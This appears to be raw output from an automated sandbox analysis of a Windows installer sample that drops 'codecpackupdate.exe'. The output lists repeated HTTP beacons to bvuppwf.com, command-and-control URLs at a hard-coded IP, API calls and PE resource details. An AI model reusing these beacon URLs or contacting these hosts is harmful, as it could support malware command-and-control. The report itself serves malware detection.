        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknownDNS traffic detected: queries for: bvuppwf.com
        Source: codecpackupdate.exe, 00000003.00000002.2868115063.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/se0-
        Source: codecpackupdate.exe, 00000003.00000002.2869004771.0000000003682000.00000004.00000020.00020000.00000000.sdmp, codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=
        Source: codecpackupdate.exe, 00000003.00000002.2869004771.0000000003682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd8
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d784
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c(
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e9
        Source: codecpackupdate.exe, 00000003.00000002.2869086684.0000000003786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e99282
        Source: codecpackupdate.exe, 00000003.00000002.2868115063.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128U-~
        Source: is-K7UM1.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vovsoft.com
        Source: 0RWRPBSuDx.tmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MD4P1.tmp.1.dr, 0RWRPBSuDx.tmp.0.drString found in binary or memory: http://www.innosetup.com/
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org).
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608850294.0000000002088000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608714441.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MD4P1.tmp.1.dr, 0RWRPBSuDx.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608850294.0000000002088000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608714441.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MD4P1.tmp.1.dr, 0RWRPBSuDx.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vovsoft.com/contact/
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vovsoft.com/contact/.
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vovsoft.com/newsletter/
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0042ED54 NtdllDefWindowProc_A,1_2_0042ED54
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00423AF4 NtdllDefWindowProc_A,1_2_00423AF4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00412548 NtdllDefWindowProc_A,1_2_00412548
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00455448 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00455448
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00473A10 NtdllDefWindowProc_A,1_2_00473A10
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0042E6DC: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E6DC
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_0040936C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00453D4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00453D4C
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_004083300_2_00408330
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0046C0D01_2_0046C0D0
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00434B5C1_2_00434B5C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0047B0A31_2_0047B0A3
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004637D41_2_004637D4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004443041_2_00444304
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0045C4C41_2_0045C4C4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004307001_2_00430700
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004449FC1_2_004449FC
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00480B581_2_00480B58
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00444E081_2_00444E08
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004594981_2_00459498
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0043D5E41_2_0043D5E4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004658241_2_00465824
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00481A301_2_00481A30
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00487BD41_2_00487BD4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0042FB901_2_0042FB90
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00443D5C1_2_00443D5C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00433E581_2_00433E58
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 2_2_004010512_2_00401051
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 2_2_00401C262_2_00401C26
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_004010513_2_00401051
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00401C263_2_00401C26
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A0E18D3_2_00A0E18D
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A0DC993_2_00A0DC99
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A0AC3A3_2_00A0AC3A
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A084423_2_00A08442
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A0E5A53_2_00A0E5A5
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A12DB43_2_00A12DB4
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A09E843_2_00A09E84
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A14E293_2_00A14E29
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_009FEFAD3_2_009FEFAD
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A2BCEB3_2_00A2BCEB
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A2BD583_2_00A2BD58
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Codec Pack Update\is-06H7C.tmp 8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00405964 appears 101 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00406A2C appears 38 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00455DD4 appears 68 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00403400 appears 59 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00445668 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00455BC8 appears 95 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00433D70 appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 0040785C appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00451CC8 appears 88 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00408B74 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00403494 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00445938 appears 59 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: String function: 00403684 appears 211 times
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: String function: 00A15330 appears 138 times
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: String function: 00A08AE0 appears 37 times
        Source: 0RWRPBSuDx.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: 0RWRPBSuDx.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: 0RWRPBSuDx.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: 0RWRPBSuDx.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: 0RWRPBSuDx.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: 0RWRPBSuDx.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-MD4P1.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-MD4P1.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: is-MD4P1.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
